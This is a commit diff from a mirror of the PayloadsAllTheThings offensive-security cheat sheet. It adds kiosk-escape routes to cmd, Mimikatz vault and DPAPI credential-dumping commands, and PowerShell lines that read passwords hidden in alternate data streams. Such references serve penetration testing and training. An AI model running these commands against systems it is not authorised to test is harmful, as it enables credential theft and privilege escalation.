Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

Alternate Data Stream

Browse source
This commit is contained in:
Swissky 2021-01-13 10:22:59 +01:00
parent 836861c86e
commit 01aadf3a44
3 changed files with 17 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
Methodology and Resources/Escape Breakout.md
View file

@ -20,10 +20,11 @@
* **Shortcut**
* [Window] + [R] -> cmd
* [CTRL] + [ALT] + [SHIFT] -> Task Manager
* [CTRL] + [ALT] + [DELETE] -> Task Manager
* **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it
* **Drag-and-drop**: dragging and dropping any file onto the cmd.exe
* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe`
* **Task Manager**: `File` > `New Task (Run...)`
* **Task Manager**: `File` > `New Task (Run...)` > `cmd`
* **MSPAINT.exe**
* Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
* Zoom in to make the following tasks easier

8
Methodology and Resources/Windows - Mimikatz.md
View file

@ -190,7 +190,7 @@ $ mimikatz !sekurlsa::dpapi
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
```
Task Scheduled credentials
### Task Scheduled credentials
```powershell
mimikatz(commandline) # vault::cred /patch
@ -204,6 +204,12 @@ Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Attributes : 0
```
### Vault
```powershell
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
```
## Mimikatz - Commands list

8
Methodology and Resources/Windows - Privilege Escalation.md
View file

@ -21,6 +21,7 @@
* [Sticky Notes passwords](#sticky-notes-passwords)
* [Passwords stored in services](#passwords-stored-in-services)
* [Powershell history](#powershell-history)
* [Password in Alternate Data Stream](#password-in-alternate-data-stream)
* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
* [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
@ -477,6 +478,13 @@ cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
```
### Password in Alternate Data Stream
```ps1
PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag
```
## EoP - Processes Enumeration and Tasks
What processes are running?